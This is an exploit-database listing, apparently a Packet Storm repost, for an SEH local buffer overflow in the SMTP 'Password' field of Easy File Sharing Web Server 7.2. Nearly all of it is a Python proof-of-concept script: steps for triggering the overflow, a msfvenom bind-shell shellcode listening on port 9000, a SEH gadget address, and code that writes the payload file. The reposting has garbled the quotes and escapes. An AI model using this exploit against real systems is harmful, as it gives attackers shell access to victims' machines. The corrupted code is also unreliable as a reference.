Easy File Sharing Web Server 7.2 Local Buffer Overflow ≈ Packet Storm


# Exploit Title: Easy File Sharing Web Server 7.2 – SMTP ‘Password’ Local Buffer Overflow (SEH)
# Date: 03/16/2020
# Author: Felipe Winsnes
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/download.php
# Version: 7.2
# Tested on: Windows 7

# Proof of Concept:
# 1.- Run the python script « poc.py », it will create a new file « poc.txt »
# 2.- Copy the content of the new file ‘poc.txt’ to clipboard
# 3.- Open fsws.exe
# 4.- Go to ‘Options’
# 5.- Click upon ‘SMTP Setup’
# 6.- Paste clipboard on bottom-right ‘Password’ parameter
# 7.- Profit

# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Locally-Exploiting-SMTP-section-in-Easy-File-Sharing-Web-Server/

import struct

# msfvenom -p windows/shell_bind_tcp LPORT=9000 -f py -e x86/alpha_mixed EXITFUNC=thread
# Payload size: 718 bytes

buf = b » »
buf += b »x89xe1xddxc5xd9x71xf4x5fx57x59x49x49x49″
buf += b »x49x49x49x49x49x49x49x43x43x43x43x43x43″
buf += b »x37x51x5ax6ax41x58x50x30x41x30x41x6bx41″
buf += b »x41x51x32x41x42x32x42x42x30x42x42x41x42″
buf += b »x58x50x38x41x42x75x4ax49x69x6cx49x78x6e »
buf += b »x62x67x70x57x70x63x30x31x70x6fx79x78x65″
buf += b »x56x51x6bx70x72x44x6ex6bx70x50x70x30x6c »
buf += b »x4bx43x62x44x4cx4ex6bx46x32x54x54x4cx4b »
buf += b »x30x72x55x78x36x6fx68x37x30x4ax67x56x36″
buf += b »x51x6bx4fx4cx6cx65x6cx50x61x63x4cx54x42″
buf += b »x74x6cx67x50x59x51x5ax6fx36x6dx56x61x68″
buf += b »x47x4ax42x6ax52x70x52x63x67x6ex6bx73x62″
buf += b »x46x70x4ex6bx63x7ax77x4cx6cx4bx72x6cx36″
buf += b »x71x30x78x48x63x53x78x37x71x5ax71x43x61″
buf += b »x4cx4bx72x79x37x50x66x61x4ax73x4cx4bx52″
buf += b »x69x45x48x58x63x54x7ax30x49x6cx4bx64x74″
buf += b »x6ex6bx77x71x78x56x36x51x49x6fx6cx6cx6f »
buf += b »x31x68x4fx36x6dx73x31x78x47x45x68x69x70″
buf += b »x42x55x6cx36x35x53x51x6dx5ax58x75x6bx63″
buf += b »x4dx36x44x31x65x58x64x63x68x4ex6bx32x78″
buf += b »x47x54x46x61x4ex33x70x66x4ex6bx66x6cx30″
buf += b »x4bx6ex6bx51x48x47x6cx75x51x6ex33x6ex6b »
buf += b »x56x64x4cx4bx47x71x4ex30x6ex69x63x74x57″
buf += b »x54x57x54x31x4bx53x6bx61x71x32x79x33x6a »
buf += b »x46x31x79x6fx4dx30x73x6fx31x4fx43x6ax6c »
buf += b »x4bx37x62x48x6bx6ex6dx71x4dx51x78x74x73″
buf += b »x76x52x43x30x37x70x73x58x54x37x64x33x30″
buf += b »x32x61x4fx70x54x33x58x30x4cx61x67x31x36″
buf += b »x66x67x69x6fx6ex35x78x38x4ax30x46x61x33″
buf += b »x30x77x70x74x69x6ax64x31x44x50x50x72x48″
buf += b »x66x49x6dx50x70x6bx75x50x4bx4fx6ex35x43″
buf += b »x5ax56x68x61x49x70x50x48x62x49x6dx61x50″
buf += b »x62x70x33x70x56x30x70x68x39x7ax44x4fx39″
buf += b »x4fx79x70x69x6fx4ex35x5ax37x43x58x64x42″
buf += b »x63x30x57x53x34x68x6cx49x5ax46x73x5ax46″
buf += b »x70x32x76x62x77x35x38x5ax62x49x4bx74x77″
buf += b »x50x67x4bx4fx48x55x66x37x31x78x4fx47x68″
buf += b »x69x67x48x39x6fx49x6fx69x45x53x67x62x48″
buf += b »x71x64x58x6cx65x6bx78x61x39x6fx6ax75x36″
buf += b »x37x6dx47x61x78x70x75x62x4ex70x4dx45x31″
buf += b »x69x6fx4ex35x71x78x43x53x70x6dx65x34x77″
buf += b »x70x6cx49x7ax43x62x77x66x37x70x57x34x71″
buf += b »x49x66x42x4ax44x52x53x69x50x56x58x62x4b »
buf += b »x4dx72x46x39x57x53x74x75x74x77x4cx65x51″
buf += b »x66x61x4ex6dx31x54x45x74x66x70x39x56x47″
buf += b »x70x70x44x71x44x42x70x32x76x72x76x56x36″
buf += b »x61x56x70x56x42x6ex32x76x73x66x32x73x73″
buf += b »x66x72x48x63x49x38x4cx47x4fx6dx56x59x6f »
buf += b »x39x45x4fx79x39x70x52x6ex71x46x51x56x49″
buf += b »x6fx50x30x45x38x57x78x6cx47x47x6dx51x70″
buf += b »x6bx4fx69x45x4fx4bx79x70x57x6dx66x4ax76″
buf += b »x6ax70x68x4dx76x7ax35x4fx4dx4fx6dx6bx4f »
buf += b »x6ax75x35x6cx64x46x33x4cx37x7ax6fx70x4b »
buf += b »x4bx59x70x50x75x43x35x4fx4bx63x77x67x63″
buf += b »x32x52x62x4fx33x5ax73x30x56x33x39x6fx7a »
buf += b »x75x41x41″

seh = struct.pack(« <I », 0x1002324C) # 0x1002324c : pop esi # pop edi # ret | ascii {PAGE_EXECUTE_READ} [ImageLoad.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:EFS SoftwareEasy File Sharing Web ServerImageLoad.dll)
nseh = struct.pack(« <I », 0x06710870)

buffer = « A » * 512 + nseh + seh + « A » * 20 + buf + « xff » * 200
f = open (« poc.txt », « w »)
f.write(buffer)
f.close()



Source link

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *